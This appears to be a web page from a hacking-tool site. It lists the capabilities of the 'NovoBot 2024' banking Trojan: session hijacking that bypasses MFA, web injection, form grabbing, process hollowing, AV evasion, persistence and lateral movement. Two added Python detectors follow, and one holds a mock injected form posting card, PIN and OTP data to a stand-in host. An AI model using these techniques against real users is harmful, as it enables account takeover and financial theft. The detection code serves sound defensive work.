![NovoBot 2024](https://blackhattool.com/wp-content/uploads/2025/07/NovoBot-2024.png)
NovoBot 2024 is a banking Trojan and information stealer that builds on techniques popularised by earlier banking Trojans such as Zeus and IcedID. It targets online banking, cryptocurrency wallets and financial applications: it steals credentials, and it reuses already-authenticated sessions so that the multi-factor authentication (MFA) step that protected the login is never re-challenged. Distribution is through phishing campaigns, malicious advertising and exploit kits. Once installed it performs session hijacking, form grabbing and web injection, altering banking pages inside the victim's browser to capture data and manipulate transactions.
Detailed Features of NovoBot

1. Advanced Financial Data Theft
- Web Injection Framework: Modifies banking pages inside the victim's browser after TLS decryption (the bank's server sees nothing unusual), adding fake fields or whole payment forms that capture credentials and card data.
- Session Hijacking: Steals the cookies of an already-authenticated banking session and replays them from the operator's machine, so the MFA step (2FA, OTP, biometric login) is never re-challenged.
- Cryptocurrency Targeting: Scans for and steals credentials and wallet data from MetaMask, Trust Wallet and Ledger Live.
- Form Grabbing: Captures the contents of submitted forms from within the browser before they are encrypted, and harvests stored auto-fill data (Chrome, Firefox, Edge); a keylogger covers what form grabbing misses.

2. Evasion and Anti-Analysis
- Process Hollowing: Starts a legitimate process (explorer.exe, svchost.exe) suspended, replaces its in-memory image with the payload and resumes it, so the malicious code runs under a trusted process name.
- Polymorphic Code: Re-encodes each build so that the static signatures used by AV/EDR no longer match.
- Sandbox & VM Detection: Checks for analysis environments and stays dormant if one is detected.

3. Persistence
- Registry Modifications: Creates auto-run (Run/RunOnce) entries for persistence.
- DLL Side-Loading: Drops a malicious DLL next to a legitimate signed application that loads it by name, so the payload runs under a trusted, signed parent.

4. Lateral Movement and Command-and-Control
- Lateral Movement: Uses RDP, SMB exploits and credentials harvested with Mimikatz to spread across networks.
- Encrypted C2 Channels: Uses HTTPS, DNS tunnelling or Tor for stealth.
- Modular Updates: Downloads additional payloads (keyloggers, ransomware) on demand.
- Botnet Integration: Can operate as part of a larger banking botnet (e.g. TrickBot, QakBot).

5. Cross-Platform Variants
- Android Version: Targets mobile banking apps via fake APK downloads.
- macOS Compatibility: A rare but emerging variant for Apple users.
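The session-hijacking feature above works because a stolen cookie is, to the bank's server, indistinguishable from the victim's own browser. The defensive check a practitioner wants is therefore on the server side: bind each session to the client fingerprint seen at login and alert when the same session identifier turns up from a different client. The following is an added detection example written for this page; it is not code from the original page or from NovoBot. It assumes a hypothetical one-line-per-request access-log format with `ip=`, `sid=` and `ua=` fields, and the log lines themselves are constructed for the example.

```python
"""Flag banking sessions that are reused from a different client fingerprint.

Added, illustrative detection logic (not NovoBot code, not from the original
page). Assumed log format (hypothetical): one line per request,
    <timestamp> ip=<client ip> sid=<session id> ua="<user agent>" <METHOD> <path>
The sample lines below are constructed for this example.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<ts>\S+) ip=(?P<ip>\S+) sid=(?P<sid>\S+) ua="(?P<ua>[^"]*)" '
    r'(?P<method>[A-Z]+) (?P<path>\S+)$'
)

# Constructed sample: the real user logs in from 203.0.113.7; a few minutes
# later the same session cookie appears from 198.51.100.23 with a different
# browser and immediately hits the transfer endpoint. Session d4e5f6 is a
# normal user who never changes client.
SAMPLE_LOG = """\
2024-03-01T09:00:01Z ip=203.0.113.7 sid=a1b2c3 ua="Mozilla/5.0 (Windows NT 10.0) Firefox/123.0" POST /login
2024-03-01T09:00:05Z ip=203.0.113.7 sid=a1b2c3 ua="Mozilla/5.0 (Windows NT 10.0) Firefox/123.0" GET /accounts
2024-03-01T09:03:40Z ip=198.51.100.23 sid=a1b2c3 ua="Mozilla/5.0 (X11; Linux x86_64) Chrome/122.0" GET /accounts
2024-03-01T09:03:41Z ip=198.51.100.23 sid=a1b2c3 ua="Mozilla/5.0 (X11; Linux x86_64) Chrome/122.0" POST /transfer
2024-03-01T09:10:00Z ip=192.0.2.55 sid=d4e5f6 ua="Mozilla/5.0 (Macintosh) Safari/17.3" POST /login
2024-03-01T09:10:09Z ip=192.0.2.55 sid=d4e5f6 ua="Mozilla/5.0 (Macintosh) Safari/17.3" POST /transfer
"""


def parse_log(text):
    """Parse log text into a list of dicts; lines that do not match are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            events.append(m.groupdict())
    return events


def find_hijacked_sessions(events, sensitive_paths=("/transfer", "/payee")):
    """Return {sid: [alerts]} for sessions seen from more than one client.

    Each session is bound to the (ip, user-agent) pair of its first request.
    Every later request from a different pair is reported; requests to
    money-moving endpoints from the foreign client are marked high severity.
    """
    binding = {}
    alerts = defaultdict(list)
    for ev in events:
        fp = (ev["ip"], ev["ua"])
        sid = ev["sid"]
        if sid not in binding:
            binding[sid] = fp          # first sighting defines the legitimate client
            continue
        if fp != binding[sid]:
            severity = "high" if ev["path"] in sensitive_paths else "medium"
            alerts[sid].append({
                "ts": ev["ts"],
                "severity": severity,
                "bound_to": binding[sid],
                "seen_from": fp,
                "path": ev["path"],
            })
    return dict(alerts)


if __name__ == "__main__":
    for sid, hits in find_hijacked_sessions(parse_log(SAMPLE_LOG)).items():
        for h in hits:
            print(f"{h['ts']} sid={sid} {h['severity']}: {h['path']} from {h['seen_from'][0]}, bound to {h['bound_to'][0]}")
```

A bare IP change is a weak signal on its own (mobile users roam between addresses all day), which is why the fingerprint here is the IP and User-Agent pair; in production it is worth adding the TLS client fingerprint. The practical response to a medium alert is to re-challenge MFA on the next sensitive action rather than to kill the session outright, since a stolen cookie replayed from the attacker's machine cannot answer that challenge while a roaming legitimate user can.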
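The web-injection feature listed above rewrites the bank's page inside the victim's browser, typically by adding a form that asks for data the real login never requests (card number, PIN, one-time code) and posts it to an attacker-controlled host. The check below is an added example for this page, not code from the original page or from NovoBot: it scans a rendered page for off-origin form actions, for forms that ask for card or OTP data, and for scripts loaded from hosts outside an allowlist. It assumes the bank's origin is `bank.example` and that the HTML is captured from a real browser; the HTML itself is constructed to mimic an inject.

```python
"""Flag web-inject style changes in a banking page as a browser renders it.

Added, illustrative check; not code from the original page or from NovoBot.
Assumptions: the bank knows its own origin and the hosts it legitimately
loads scripts from, and the HTML is captured from a browser (where injects
happen), not fetched from the bank's own server (where they do not exist).
SAMPLE_HTML is constructed to mimic an injected 'card verification' form.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field-name fragments a login page should never ask for. An inject that adds
# them is after card data and one-time codes, not just the password.
SECRET_FIELD_HINTS = ("pin", "otp", "cvv", "card")

SAMPLE_HTML = """\
<html><body>
<script src="https://bank.example/static/app.js"></script>
<form action="/login" method="post">
  <input name="username"><input name="password" type="password">
</form>
<script src="https://cdn-static-assets.example.net/inj.js"></script>
<form action="https://cdn-static-assets.example.net/collect" method="post">
  <input name="card_number"><input name="card_pin"><input name="otp">
</form>
</body></html>
"""


class InjectScanner(HTMLParser):
    def __init__(self, origin, allowed_script_hosts):
        super().__init__()
        self.origin = origin
        self.allowed = set(allowed_script_hosts) | {origin}
        self.findings = []          # list of (kind, detail)
        self._form_fields = None    # field names of the form being parsed

    def _host(self, url):
        # A relative URL resolves against the page, i.e. stays on-origin.
        return urlparse(url).netloc or self.origin

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            action = a.get("action") or ""
            self._form_fields = []
            if self._host(action) != self.origin:
                self.findings.append(("form-offsite", action))
        elif tag == "input" and self._form_fields is not None:
            self._form_fields.append((a.get("name") or a.get("id") or "").lower())
        elif tag == "script" and a.get("src"):
            if self._host(a["src"]) not in self.allowed:
                self.findings.append(("script-unknown-host", a["src"]))

    def handle_endtag(self, tag):
        if tag == "form" and self._form_fields is not None:
            secrets = [f for f in self._form_fields
                       if any(h in f for h in SECRET_FIELD_HINTS)]
            if secrets:
                self.findings.append(("form-asks-for-secrets", secrets))
            self._form_fields = None


def scan_page(html, origin, allowed_script_hosts=()):
    """Return the list of (kind, detail) findings for one rendered page."""
    scanner = InjectScanner(origin, allowed_script_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for kind, detail in scan_page(SAMPLE_HTML, "bank.example"):
        print(f"{kind}: {detail}")
```

Because the injection happens in the infected browser, a synthetic monitor running from a clean host will always see a clean page; the check only pays off when it runs where the inject does, for instance as client-side integrity JavaScript the bank ships with the login page, or over pages captured from suspect endpoints. Injects also commonly hide the original fields with `display:none` rather than removing them, which this scanner does not look for.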